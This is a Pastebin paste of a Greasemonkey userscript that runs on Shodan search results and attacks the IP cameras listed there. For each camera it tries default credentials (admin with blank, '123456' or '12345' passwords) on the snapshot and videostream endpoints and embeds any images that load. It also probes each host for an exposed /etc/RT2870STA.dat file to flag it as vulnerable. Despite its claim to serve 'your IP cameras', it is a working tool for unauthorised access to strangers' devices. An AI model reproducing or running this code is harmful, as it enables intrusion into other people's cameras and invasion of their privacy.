theunknownwatcher

Helper

Mar 30th, 2018
422
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // ==UserScript==
  2. // @name         Shodan Cam Helper
  3. // @namespace    http://ebaumsworld.com/
  4. // @version      0.1
  5. // @description  Adds snapshots for your IP cameras
  6. // @author       joe
  7. // @match        https://www.shodan.io/search?query*
  8. // @grant        GM_xmlhttpRequest
  9. // ==/UserScript==
  10.  
  11. var ENABLED_LOGGABLE_VIDEOSTREAM = false;
  12. var ENABLED_SNAPSHOT = true;
  13. var ENABLED_TRAVERSAL = true;
  14. var IPs = [];
  15. var TIMEOUT_IN_MS = 2000;
  16.  
  17. addCredentials = function(type, username, password, url)
  18. {
  19.     if(type == 1)
  20.     { // add at http
  21.         return url.replace("http://", "http://" + username + ":" + password + "@");
  22.     }
  23.     else
  24.     {
  25.         if(url.indexOf("?") > 0)
  26.         {
  27.             url += "&";
  28.         }
  29.         else
  30.         {
  31.             url += "?";
  32.         }
  33.         return url + "user=" + username + "&pwd=" + password;
  34.     }
  35. }
  36.  
  37.  
  38. var shodanIPs = document.getElementsByClassName("ip");
  39. var i = 0;
  40. for(i = 0; i < shodanIPs.length; i++)
  41. {
  42.     var url = shodanIPs[i].getElementsByTagName("a")[0].href;
  43.     var videostream =  addCredentials(1, "admin", "", url + "videostream.cgi");
  44.     var snapshot = addCredentials(2, "admin", "", url + "snapshot.cgi");
  45.     var snapshot2 = addCredentials(2, "admin", "123456", url + "snapshot.cgi");
  46.     var snapshot3 = addCredentials(2, "admin", "12345", url + "snapshot.cgi");
  47.     //var traversalCheck = url + "//etc/RT2870STA.dat";
  48.    
  49.     var addition = "<br />";
  50.    
  51.     if(ENABLED_LOGGABLE_VIDEOSTREAM)
  52.     {
  53.         addition += "Loggable: <img src=\"" + videostream + "\" /><br />";
  54.     }
  55.     if(ENABLED_SNAPSHOT)
  56.     {
  57.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot + "\" /><br />";
  58.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot2 + "\" /><br />";
  59.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot3 + "\" /><br />";
  60.     }
  61.     if(ENABLED_TRAVERSAL)
  62.     {
  63.         addition += "<div class=\"" + url + "\"> </div>";
  64.         IPs.unshift(url);
  65.     }
  66.    
  67.     shodanIPs[i].innerHTML += addition;
  68. }
  69.  
  70. function checkVulnerability()
  71. {
  72.     if(IPs.length > 0)
  73.     {
  74.         var currentIP = IPs.pop();
  75.         GM_xmlhttpRequest({
  76.             url: currentIP + "/etc/RT2870STA.dat",
  77.             method: "GET",
  78.             onload: function(response) {
  79.                 var text = "";
  80.                 if(response.status == "200")
  81.                 {
  82.                     text = "<b><u>Vulnerable to //proc/kcore!</u></b>";
  83.                 }
  84.                 else
  85.                 {
  86.                     text = "Not vulnerable?";
  87.                 }
  88.                 document.getElementsByClassName(currentIP)[0].innerHTML = text;
  89.                 checkVulnerability();
  90.             },
  91.             timeout: TIMEOUT_IN_MS,
  92.             ontimeout: function() {
  93.                 var text = "Request timed out (Is site up?)";
  94.                 document.getElementsByClassName(currentIP)[0].innerHTML = text;
  95.                 checkVulnerability();  
  96.             }
  97.         });
  98.     }
  99. }
  100.  
  101. checkVulnerability();
RAW Paste Data